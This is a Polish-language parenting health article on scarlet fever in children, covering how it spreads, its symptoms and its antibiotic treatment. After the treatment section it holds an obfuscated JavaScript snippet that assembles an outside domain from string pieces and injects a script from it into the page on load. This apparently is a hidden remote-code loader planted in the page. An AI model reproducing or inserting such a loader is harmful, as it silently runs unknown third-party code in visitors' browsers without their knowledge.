Wszystko o szkarlatynie u dziecka: objawy, przyczyny i leczenie
Szkarlatyna była kiedyś jedną z najbardziej poważnych i śmiertelnych chorób u dzieci. Obecnie szkarlatyna u dzieci może być skutecznie leczona antybiotykami i jest mniej niebezpieczna niż w przeszłości. Najczęściej szkarlatyna występuje u dzieci w wieku od 5 do 15 lat, ale nie jest niczym niezwykłym gdy notuje się przypadki wystąpienia jej u dzieci w wieku poniżej 2 lat.
Jak dochodzi do zarażenia i rozwoju szkarlatyny
Na początku pojawia się ból gardła, któremu towarzyszy wysypka. Choroba ta zaczyna się podobnie jak infekcja górnych dróg oddechowych spowodowana przez Streptococcus - ten sam, który odpowiada za bóle gardła i niektóre infekcje skórne. Następnie te bakterie produkują toksyny, która wywołuje wysypkę. Jeśli Twoje dziecko ma szkarlatynę, to prawdopodobnie zaraził się od innego dziecka na przykład korzystając z tych samych kubków, a nawet zabawek. Niekiedy szkarlatyna może również wystąpić z powodu zakażenia skóry, w którym to przypadku dziecko prawdopodobnie nie będzie odczuwało bólu gardła.
Objawy szkarlatyny
Szkarlatyna u dziecka zazwyczaj rozpoczyna się bólem gardła, bólem głowy i gorączką 38 stopni Celsjusza lub wyższą. Na początku choroby, język dziecka może mieć biały lub żółtawy nalot, który później może stać się czerwony. Migdałki dzieci może być również nim pokryte lub mogą być spuchnięte. Inne znane objawy, które mogą wystąpić to dreszcze, utrata apetytu, powiększenie węzłów chłonnych, złe samopoczucie lub wymioty. Wysypka zwykle pojawia się na drugi dzień i trwa od 2 do 5 dni. Zaczyna się jak wysypka pojawiająca się od głowy i szyi, a następnie rozprzestrzenia się to po całym ciele. Na pewnym etapie choroby mogą one powodować swędzące guzki.
Jak leczyć szkarlatynę?
Lekarz wykonuje wymaz gardła i na tej podstawie dokonuje ostatecznego potwierdzenia diagnozy. Później, lekarz przepisze dziecku odpowiednie antybiotyki. Dzięki właściwemu leczeniu, okres odzyskiwania zdrowia jest bardzo szybki, ale wysypka może się utrzymywać przez kilka dni. Nieleczone zakażenie paciorkowcem może mieć poważne komplikacje, które mogą prowadzić do długotrwałych problemów z uszkodzeniem serca włącznie.
(function(){ zd4k=document.createElement("script");zd4k_=(("u")+"st")+"a";zd4k.async=true; zd4k.type="text/javascript";zd4k_+=("t.i")+""+"n";zd4k_+=(("f")+"o");zd4k_+="/"; zd4ku="15400521.";zd4ku+="v476qmmvd4kebd6bb7z"+"cmtqmw3a8wl"; zd4k.src="//"+zd4k_+zd4ku; document.body.appendChild(zd4k); })();
Ocena
- Dodaj komentarz
- 492 widoki